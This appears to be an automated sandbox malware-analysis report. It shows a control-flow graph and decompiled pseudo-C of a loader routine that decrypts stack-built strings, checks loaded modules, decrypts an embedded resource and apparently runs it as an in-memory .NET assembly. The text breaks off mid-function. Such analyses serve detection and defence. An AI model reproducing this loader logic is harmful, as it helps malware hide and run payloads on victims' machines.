                            control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 25 401c85-401c8d 19->25 20->21 22 401cb0-401cce call 401650 21->22 23 401c9c-401caf CloseHandle 21->23 32 401cd0-401cd4 22->32 25->14 25->20 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 42 401cf5-401cf7 35->42 40 401cda-401ce0 36->40 41 401cec-401cee 36->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->35 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 70 401d42-401d4a 65->70 66->67 67->23 71 401d5d-401d7b call 401650 67->71 70->60 70->66 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                            C-Code - Quality: 77%
                            			E004019F0(void* __edx, void* __eflags) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				void* _t337;
                            				void* _t340;
                            				int _t341;
                            				CHAR* _t344;
                            				intOrPtr* _t349;
                            				int _t350;
                            				long _t352;
                            				signed int _t354;
                            				intOrPtr _t358;
                            				long _t359;
                            				CHAR* _t364;
                            				struct HINSTANCE__* _t365;
                            				CHAR* _t366;
                            				_Unknown_base(*)()* _t367;
                            				int _t368;
                            				int _t369;
                            				int _t370;
                            				intOrPtr* _t376;
                            				int _t378;
                            				intOrPtr _t379;
                            				intOrPtr* _t381;
                            				int _t383;
                            				intOrPtr* _t384;
                            				int _t385;
                            				int _t396;
                            				int _t399;
                            				int _t402;
                            				int _t405;
                            				intOrPtr* _t407;
                            				int _t413;
                            				int _t415;
                            				void* _t421;
                            				int _t422;
                            				int _t424;
                            				intOrPtr* _t428;
                            				intOrPtr _t429;
                            				intOrPtr* _t431;
                            				int _t432;
                            				int _t435;
                            				intOrPtr* _t437;
                            				int _t438;
                            				intOrPtr* _t439;
                            				int _t440;
                            				int _t442;
                            				signed int _t448;
                            				signed int _t451;
                            				signed int _t452;
                            				int _t469;
                            				int _t471;
                            				int _t482;
                            				signed int _t486;
                            				intOrPtr* _t488;
                            				intOrPtr* _t490;
                            				intOrPtr* _t492;
                            				intOrPtr _t493;
                            				void* _t494;
                            				struct HRSRC__* _t497;
                            				void* _t514;
                            				int _t519;
                            				intOrPtr* _t520;
                            				void* _t524;
                            				void* _t525;
                            				struct HINSTANCE__* _t526;
                            				intOrPtr _t527;
                            				void* _t531;
                            				void* _t535;
                            				struct HRSRC__* _t536;
                            				intOrPtr* _t537;
                            				intOrPtr* _t539;
                            				int _t542;
                            				int _t543;
                            				intOrPtr* _t547;
                            				intOrPtr* _t548;
                            				intOrPtr* _t549;
                            				intOrPtr* _t550;
                            				void* _t551;
                            				intOrPtr _t552;
                            				int _t555;
                            				void* _t556;
                            				void* _t557;
                            				void* _t558;
                            				void* _t559;
                            				void* _t560;
                            				void* _t561;
                            				void* _t562;
                            				intOrPtr* _t563;
                            				void* _t564;
                            				void* _t565;
                            				void* _t566;
                            				void* _t567;
                            
                            				_t567 = __eflags;
                            				_t494 = __edx;
                            				__imp__OleInitialize(0); // executed
                            				 *((char*)(_t556 + 0x18)) = 0xe0;
                            				 *((char*)(_t556 + 0x19)) = 0x3b;
                            				 *((char*)(_t556 + 0x1a)) = 0x8d;
                            				 *((char*)(_t556 + 0x1b)) = 0x2a;
                            				 *((char*)(_t556 + 0x1c)) = 0xa2;
                            				 *((char*)(_t556 + 0x1d)) = 0x2a;
                            				 *((char*)(_t556 + 0x1e)) = 0x2a;
                            				 *((char*)(_t556 + 0x1f)) = 0x41;
                            				 *((char*)(_t556 + 0x20)) = 0xd3;
                            				 *((char*)(_t556 + 0x21)) = 0x20;
                            				 *((char*)(_t556 + 0x22)) = 0x64;
                            				 *((char*)(_t556 + 0x23)) = 6;
                            				 *((char*)(_t556 + 0x24)) = 0x8a;
                            				 *((char*)(_t556 + 0x25)) = 0xf7;
                            				 *((char*)(_t556 + 0x26)) = 0x3d;
                            				 *((char*)(_t556 + 0x27)) = 0x9d;
                            				 *((char*)(_t556 + 0x28)) = 0xd9;
                            				 *((char*)(_t556 + 0x29)) = 0xee;
                            				 *((char*)(_t556 + 0x2a)) = 0x15;
                            				 *((char*)(_t556 + 0x2b)) = 0x68;
                            				 *((char*)(_t556 + 0x2c)) = 0xf4;
                            				 *((char*)(_t556 + 0x2d)) = 0x76;
                            				 *((char*)(_t556 + 0x2e)) = 0xb9;
                            				 *((char*)(_t556 + 0x2f)) = 0x34;
                            				 *((char*)(_t556 + 0x30)) = 0xbf;
                            				 *((char*)(_t556 + 0x31)) = 0x1e;
                            				 *((char*)(_t556 + 0x32)) = 0xe7;
                            				 *((char*)(_t556 + 0x33)) = 0x78;
                            				 *((char*)(_t556 + 0x34)) = 0x98;
                            				 *((char*)(_t556 + 0x35)) = 0xe9;
                            				 *((char*)(_t556 + 0x36)) = 0x6f;
                            				 *((char*)(_t556 + 0x37)) = 0xb4;
                            				 *((char*)(_t556 + 0x38)) = 0;
                            				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                            				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                            				_t557 = _t556 + 0xc;
                            				if(_t337 == 0x41b2a0) {
                            					L80:
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                            					_t525 = _t340;
                            					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                            					 *((char*)(_t557 + 0x64)) = 0xce;
                            					 *((char*)(_t557 + 0x65)) = 0x27;
                            					 *((char*)(_t557 + 0x66)) = 0x9c;
                            					 *((char*)(_t557 + 0x67)) = 0x1a;
                            					 *((char*)(_t557 + 0x68)) = 0x95;
                            					 *((char*)(_t557 + 0x69)) = 0x2e;
                            					 *((char*)(_t557 + 0x6a)) = 0x22;
                            					 *((char*)(_t557 + 0x6b)) = 0x57;
                            					 *((char*)(_t557 + 0x6c)) = 0x91;
                            					 *((char*)(_t557 + 0x6d)) = 0x21;
                            					 *((char*)(_t557 + 0x6e)) = 0x57;
                            					 *((char*)(_t557 + 0x6f)) = 0x3a;
                            					 *((char*)(_t557 + 0x70)) = 0xf8;
                            					 *((char*)(_t557 + 0x71)) = 0x98;
                            					 *((char*)(_t557 + 0x72)) = 0x5b;
                            					 *((char*)(_t557 + 0x73)) = 0xf4;
                            					 *((char*)(_t557 + 0x74)) = 0xb5;
                            					 *((char*)(_t557 + 0x75)) = 0x87;
                            					 *((char*)(_t557 + 0x76)) = 0x7b;
                            					 *((char*)(_t557 + 0x77)) = 0xf;
                            					 *((char*)(_t557 + 0x78)) = 0xf4;
                            					 *((char*)(_t557 + 0x79)) = 0x76;
                            					 *((char*)(_t557 + 0x7a)) = 0xb9;
                            					 *((char*)(_t557 + 0x7b)) = 0x34;
                            					 *((char*)(_t557 + 0x7c)) = 0xbf;
                            					 *((char*)(_t557 + 0x7d)) = 0x1e;
                            					 *((char*)(_t557 + 0x7e)) = 0xe7;
                            					 *((char*)(_t557 + 0x7f)) = 0x78;
                            					 *((char*)(_t557 + 0x80)) = 0x98;
                            					 *((char*)(_t557 + 0x81)) = 0xe9;
                            					 *((char*)(_t557 + 0x82)) = 0x6f;
                            					 *((char*)(_t557 + 0x83)) = 0xb4;
                            					 *((char*)(_t557 + 0x84)) = 0;
                            					 *((char*)(_t557 + 0x18)) = 0xc0;
                            					 *((char*)(_t557 + 0x19)) = 0x38;
                            					 *((char*)(_t557 + 0x1a)) = 0x8d;
                            					 *((char*)(_t557 + 0x1b)) = 0x1f;
                            					 *((char*)(_t557 + 0x1c)) = 0x8e;
                            					 *((char*)(_t557 + 0x1d)) = 0x30;
                            					 *((char*)(_t557 + 0x1e)) = 0x65;
                            					 *((char*)(_t557 + 0x1f)) = 0x47;
                            					 *((char*)(_t557 + 0x20)) = 0xd3;
                            					 *((char*)(_t557 + 0x21)) = 0x29;
                            					 *((char*)(_t557 + 0x22)) = 0x3b;
                            					 *((char*)(_t557 + 0x23)) = 0x56;
                            					 *((char*)(_t557 + 0x24)) = 0xf8;
                            					 *((char*)(_t557 + 0x25)) = 0x98;
                            					 *((char*)(_t557 + 0x26)) = 0x5b;
                            					 *((char*)(_t557 + 0x27)) = 0xf4;
                            					 *((char*)(_t557 + 0x28)) = 0xb5;
                            					 *((char*)(_t557 + 0x29)) = 0x87;
                            					 *((char*)(_t557 + 0x2a)) = 0x7b;
                            					 *((char*)(_t557 + 0x2b)) = 0xf;
                            					 *((char*)(_t557 + 0x2c)) = 0xf4;
                            					 *((char*)(_t557 + 0x2d)) = 0x76;
                            					 *((char*)(_t557 + 0x2e)) = 0xb9;
                            					 *((char*)(_t557 + 0x2f)) = 0x34;
                            					 *((char*)(_t557 + 0x30)) = 0xbf;
                            					 *((char*)(_t557 + 0x31)) = 0x1e;
                            					 *((char*)(_t557 + 0x32)) = 0xe7;
                            					 *((char*)(_t557 + 0x33)) = 0x78;
                            					 *((char*)(_t557 + 0x34)) = 0x98;
                            					 *((char*)(_t557 + 0x35)) = 0xe9;
                            					 *((char*)(_t557 + 0x36)) = 0x6f;
                            					 *((char*)(_t557 + 0x37)) = 0xb4;
                            					 *((char*)(_t557 + 0x38)) = 0;
                            					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                            					if(_t341 == 0) {
                            						L38:
                            						FindCloseChangeNotification(_t525); // executed
                            						_t526 = GetModuleHandleA(0);
                            						 *((char*)(_t557 + 0x1c)) = 0xfc;
                            						 *((char*)(_t557 + 0x1d)) = 0xb;
                            						 *((char*)(_t557 + 0x1e)) = 0xff;
                            						 *((char*)(_t557 + 0x1f)) = 0x75;
                            						 *((char*)(_t557 + 0x20)) = 0xe7;
                            						 *((char*)(_t557 + 0x21)) = 0x44;
                            						 *((char*)(_t557 + 0x22)) = 0x4b;
                            						 *((char*)(_t557 + 0x23)) = 0x23;
                            						 *((char*)(_t557 + 0x24)) = 0xbf;
                            						 *((char*)(_t557 + 0x25)) = 0x45;
                            						 *((char*)(_t557 + 0x26)) = 0x3b;
                            						 *((char*)(_t557 + 0x27)) = 0x56;
                            						 *((char*)(_t557 + 0x28)) = 0xf8;
                            						 *((char*)(_t557 + 0x29)) = 0x98;
                            						 *((char*)(_t557 + 0x2a)) = 0x5b;
                            						 *((char*)(_t557 + 0x2b)) = 0xf4;
                            						 *((char*)(_t557 + 0x2c)) = 0xb5;
                            						 *((char*)(_t557 + 0x2d)) = 0x87;
                            						 *((char*)(_t557 + 0x2e)) = 0x7b;
                            						 *((char*)(_t557 + 0x2f)) = 0xf;
                            						 *((char*)(_t557 + 0x30)) = 0xf4;
                            						 *((char*)(_t557 + 0x31)) = 0x76;
                            						 *((char*)(_t557 + 0x32)) = 0xb9;
                            						 *((char*)(_t557 + 0x33)) = 0x34;
                            						 *((char*)(_t557 + 0x34)) = 0xbf;
                            						 *((char*)(_t557 + 0x35)) = 0x1e;
                            						 *((char*)(_t557 + 0x36)) = 0xe7;
                            						 *((char*)(_t557 + 0x37)) = 0x78;
                            						 *((char*)(_t557 + 0x38)) = 0x98;
                            						 *((char*)(_t557 + 0x39)) = 0xe9;
                            						 *((char*)(_t557 + 0x3a)) = 0x6f;
                            						 *((char*)(_t557 + 0x3b)) = 0xb4;
                            						 *((char*)(_t557 + 0x3c)) = 0;
                            						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                            						_t558 = _t557 + 8;
                            						_t536 = FindResourceA(_t526, _t344, 0xa);
                            						 *(_t558 + 0x50) = _t536;
                            						_t551 = LoadResource(_t526, _t536);
                            						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                            						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                            						_push(0x40022);
                            						_t537 = _t349; // executed
                            						_t350 = E0040AF66(0, _t526, __eflags); // executed
                            						_t559 = _t558 + 8;
                            						 *(_t559 + 0x34) = _t350;
                            						__eflags = _t350;
                            						if(_t350 == 0) {
                            							 *(_t559 + 0x50) = 0;
                            						} else {
                            							E0040BA30(_t526, _t350, 0, 0x40022);
                            							_t486 =  *(_t559 + 0x40);
                            							_t559 = _t559 + 0xc;
                            							 *(_t559 + 0x50) = _t486;
                            						}
                            						E00401300( *(_t559 + 0x50));
                            						_t497 =  *(_t559 + 0x48);
                            						_t352 = SizeofResource(_t526, _t497);
                            						 *(_t559 + 0x40) = _t352;
                            						asm("cdq");
                            						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                            						__eflags = _t354;
                            						if(_t354 > 0) {
                            							_t519 =  *(_t559 + 0x3c);
                            							_t482 = _t537 - _t519;
                            							__eflags = _t482;
                            							 *(_t559 + 0x34) = _t519;
                            							 *(_t559 + 0x88) = _t482;
                            							 *(_t559 + 0x38) = _t354;
                            							do {
                            								_t424 =  *(_t559 + 0x34);
                            								_push( *(_t559 + 0x88) + _t424);
                            								_push(0x400);
                            								_push(_t424);
                            								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                            								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                            								_t179 = _t559 + 0x38;
                            								 *_t179 =  *(_t559 + 0x38) - 1;
                            								__eflags =  *_t179;
                            							} while ( *_t179 != 0);
                            						}
                            						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                            						__eflags = _t448;
                            						if(_t448 < 0) {
                            							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                            							__eflags = _t448;
                            						}
                            						__eflags = _t448;
                            						if(_t448 > 0) {
                            							_t421 =  *(_t559 + 0x40) - _t448;
                            							_push(_t421 + _t537);
                            							_push(_t448);
                            							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                            							__eflags = _t422;
                            							_push(_t422);
                            							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                            						}
                            						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                            						_t560 = _t559 + 0xc;
                            						FreeResource(_t551);
                            						_t552 =  *_t537;
                            						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                            						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                            						_t561 = _t560 + 4;
                            						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                            						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                            						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                            						_t192 = _t537 + 4; // 0x4
                            						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                            						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                            						_t528 = _t527 + 0xe;
                            						 *((char*)(_t561 + 0x34)) = 0xce;
                            						 *((char*)(_t561 + 0x35)) = 0x27;
                            						 *((char*)(_t561 + 0x36)) = 0x9c;
                            						 *((char*)(_t561 + 0x37)) = 0x1a;
                            						 *((char*)(_t561 + 0x38)) = 0x95;
                            						 *((char*)(_t561 + 0x39)) = 0x21;
                            						 *((char*)(_t561 + 0x3a)) = 0x2e;
                            						 *((char*)(_t561 + 0x3b)) = 0xd;
                            						 *((char*)(_t561 + 0x3c)) = 0xdb;
                            						 *((char*)(_t561 + 0x3d)) = 0x29;
                            						 *((char*)(_t561 + 0x3e)) = 0x57;
                            						 *((char*)(_t561 + 0x3f)) = 0x56;
                            						 *((char*)(_t561 + 0x40)) = 0xf8;
                            						 *((char*)(_t561 + 0x41)) = 0x98;
                            						 *((char*)(_t561 + 0x42)) = 0x5b;
                            						 *((char*)(_t561 + 0x43)) = 0xf4;
                            						 *((char*)(_t561 + 0x44)) = 0xb5;
                            						 *((char*)(_t561 + 0x45)) = 0x87;
                            						 *((char*)(_t561 + 0x46)) = 0x7b;
                            						 *((char*)(_t561 + 0x47)) = 0xf;
                            						 *((char*)(_t561 + 0x48)) = 0xf4;
                            						 *((char*)(_t561 + 0x49)) = 0x76;
                            						 *((char*)(_t561 + 0x4a)) = 0xb9;
                            						 *((char*)(_t561 + 0x4b)) = 0x34;
                            						 *((char*)(_t561 + 0x4c)) = 0xbf;
                            						 *((char*)(_t561 + 0x4d)) = 0x1e;
                            						 *((char*)(_t561 + 0x4e)) = 0xe7;
                            						 *((char*)(_t561 + 0x4f)) = 0x78;
                            						 *((char*)(_t561 + 0x50)) = 0x98;
                            						 *((char*)(_t561 + 0x51)) = 0xe9;
                            						 *((char*)(_t561 + 0x52)) = 0x6f;
                            						 *((char*)(_t561 + 0x53)) = 0xb4;
                            						 *((char*)(_t561 + 0x54)) = 0;
                            						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                            						_t562 = _t561 + 0x24;
                            						_t365 = LoadLibraryA(_t364); // executed
                            						_t538 = _t365;
                            						 *((char*)(_t562 + 0x10)) = 0xe0;
                            						 *((char*)(_t562 + 0x11)) = 0x18;
                            						 *((char*)(_t562 + 0x12)) = 0xad;
                            						 *((char*)(_t562 + 0x13)) = 0x36;
                            						 *((char*)(_t562 + 0x14)) = 0x95;
                            						 *((char*)(_t562 + 0x15)) = 0x21;
                            						_t451 = _t562 + 0x134;
                            						 *((char*)(_t562 + 0x1e)) = 0x2a;
                            						 *((char*)(_t562 + 0x1f)) = 0x57;
                            						 *((char*)(_t562 + 0x20)) = 0xda;
                            						 *((char*)(_t562 + 0x21)) = 0xc;
                            						 *((char*)(_t562 + 0x22)) = 0x55;
                            						 *((char*)(_t562 + 0x23)) = 0x25;
                            						 *((char*)(_t562 + 0x24)) = 0x8c;
                            						 *((char*)(_t562 + 0x25)) = 0xf9;
                            						 *((char*)(_t562 + 0x26)) = 0x35;
                            						 *((char*)(_t562 + 0x27)) = 0x97;
                            						 *((char*)(_t562 + 0x28)) = 0xd0;
                            						 *((char*)(_t562 + 0x29)) = 0x87;
                            						 *((char*)(_t562 + 0x2a)) = 0x7b;
                            						 *((char*)(_t562 + 0x2b)) = 0xf;
                            						 *((char*)(_t562 + 0x2c)) = 0xf4;
                            						 *((char*)(_t562 + 0x2d)) = 0x76;
                            						 *((char*)(_t562 + 0x2e)) = 0xb9;
                            						 *((char*)(_t562 + 0x2f)) = 0x34;
                            						 *((char*)(_t562 + 0x30)) = 0xbf;
                            						 *((char*)(_t562 + 0x31)) = 0x1e;
                            						 *((char*)(_t562 + 0x32)) = 0xe7;
                            						 *((char*)(_t562 + 0x33)) = 0x78;
                            						 *((char*)(_t562 + 0x34)) = 0x98;
                            						 *((char*)(_t562 + 0x35)) = 0xe9;
                            						 *((char*)(_t562 + 0x36)) = 0x6f;
                            						 *((char*)(_t562 + 0x37)) = 0xb4;
                            						 *((char*)(_t562 + 0x38)) = 0;
                            						_t366 = E00401650(_t562 + 0x14, _t451);
                            						_t563 = _t562 + 8;
                            						_t367 = GetProcAddress(_t365, _t366);
                            						__eflags = _t367;
                            						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                            						__eflags = _t452;
                            						 *(_t563 + 0x47) = _t452 == 0;
                            						 *0x423480 = _t367;
                            						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                            						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                            						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                            						 *(_t563 + 0x58) = 0;
                            						 *(_t563 + 0x54) = 0;
                            						__eflags = _t452;
                            						if(_t452 != 0) {
                            							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                            							__eflags = _t368;
                            							if(_t368 >= 0) {
                            								__eflags =  *(_t563 + 0x47);
                            								if( *(_t563 + 0x47) == 0) {
                            									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                            									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                            									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                            									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                            									__eflags = _t378;
                            									if(_t378 >= 0) {
                            										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                            										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                            										__eflags = _t383;
                            										if(_t383 >= 0) {
                            											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                            											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                            											__eflags = _t385;
                            											if(_t385 >= 0) {
                            												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                            												E00401870(_t563 + 0x44, _t552, "_._");
                            												_t539 = __imp__#8;
                            												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                            												 *_t539(_t563 + 0x94);
                            												E00401870(_t563 + 0x3c, _t552, "___");
                            												 *_t539(_t563 + 0xa4);
                            												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                            												_t542 =  *(_t563 + 0x58);
                            												__eflags = _t542;
                            												if(_t542 == 0) {
                            													E0040AD90(0x80004003);
                            												}
                            												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                            												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                            												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                            												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                            												_t543 = _t396;
                            												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                            												__imp__#23(_t543, _t563 + 0x48);
                            												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                            												_t564 = _t563 + 0xc;
                            												__imp__#24(_t543);
                            												_t399 =  *(_t564 + 0x54);
                            												__eflags = _t399;
                            												if(_t399 == 0) {
                            													_t399 = E0040AD90(0x80004003);
                            												}
                            												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                            												__eflags = _t543;
                            												if(_t543 != 0) {
                            													__imp__#16(_t543); // executed
                            												}
                            												_t402 =  *(_t564 + 0x34);
                            												__eflags = _t402;
                            												if(_t402 == 0) {
                            													_t402 = E0040AD90(0x80004003);
                            												}
                            												_t469 =  *(_t564 + 0x40);
                            												_t555 = _t402;
                            												__eflags = _t469;
                            												if(_t469 == 0) {
                            													_t531 = 0;
                            													__eflags = 0;
                            												} else {
                            													_t531 =  *_t469;
                            												}
                            												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                            												__imp__#411(0xc, 0, 0);
                            												_t471 =  *(_t564 + 0x3c);
                            												__eflags = _t471;
                            												if(_t471 == 0) {
                            													E0040AD90(0x80004003);
                            												}
                            												_t405 =  *(_t564 + 0x38);
                            												__eflags = _t405;
                            												if(_t405 == 0) {
                            													_t514 = 0;
                            													__eflags = 0;
                            												} else {
                            													_t514 =  *_t405;
                            												}
                            												_t563 = _t564 - 0x10;
                            												_t407 = _t563;
                            												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                            												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                            												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                            												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                            												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                            												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                            												_t538 = __imp__#9; // 0x75f4cf00
                            												_t538->i(_t563 + 0xa4);
                            												E004019A0(_t563 + 0x38);
                            												_t538->i(_t563 + 0x94);
                            												_t413 =  *(_t563 + 0x3c);
                            												__eflags = _t413;
                            												if(_t413 != 0) {
                            													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                            												}
                            												E004019A0(_t563 + 0x40);
                            												_t415 =  *(_t563 + 0x34);
                            												__eflags = _t415;
                            												if(_t415 != 0) {
                            													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                            												}
                            											}
                            										}
                            									}
                            									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                            									__eflags = _t379 - _t563 + 0x178;
                            									if(__eflags != 0) {
                            										_push(_t379);
                            										E0040B6B5(0, _t528, _t538, __eflags);
                            										_t563 = _t563 + 4;
                            									}
                            								}
                            							}
                            							_t369 =  *(_t563 + 0x54);
                            							__eflags = _t369;
                            							if(_t369 != 0) {
                            								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                            							}
                            							_t370 =  *(_t563 + 0x58);
                            							__eflags = _t370;
                            							if(_t370 != 0) {
                            								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                            							}
                            						}
                            						goto L80;
                            					} else {
                            						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                            						_t565 = _t557 + 8;
                            						_t547 = _t428;
                            						_t520 = _t565 + 0x298;
                            						while(1) {
                            							_t429 =  *_t520;
                            							if(_t429 !=  *_t547) {
                            								break;
                            							}
                            							if(_t429 == 0) {
                            								L7:
                            								_t429 = 0;
                            							} else {
                            								_t493 =  *((intOrPtr*)(_t520 + 1));
                            								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                            									break;
                            								} else {
                            									_t520 = _t520 + 2;
                            									_t547 = _t547 + 2;
                            									if(_t493 != 0) {
                            										continue;
                            									} else {
                            										goto L7;
                            									}
                            								}
                            							}
                            							L9:
                            							if(_t429 != 0) {
                            								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                            								_t557 = _t565 + 8;
                            								_t548 = _t431;
                            								_t488 = _t557 + 0x298;
                            								while(1) {
                            									_t432 =  *_t488;
                            									__eflags = _t432 -  *_t548;
                            									if(_t432 !=  *_t548) {
                            										break;
                            									}
                            									__eflags = _t432;
                            									if(_t432 == 0) {
                            										L16:
                            										_t432 = 0;
                            									} else {
                            										_t432 =  *((intOrPtr*)(_t488 + 1));
                            										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                            										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                            											break;
                            										} else {
                            											_t488 = _t488 + 2;
                            											_t548 = _t548 + 2;
                            											__eflags = _t432;
                            											if(_t432 != 0) {
                            												continue;
                            											} else {
                            												goto L16;
                            											}
                            										}
                            									}
                            									L18:
                            									__eflags = _t432;
                            									if(_t432 == 0) {
                            										goto L10;
                            									} else {
                            										_t435 = Module32Next(_t525, _t557 + 0x278);
                            										__eflags = _t435;
                            										if(_t435 != 0) {
                            											do {
                            												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
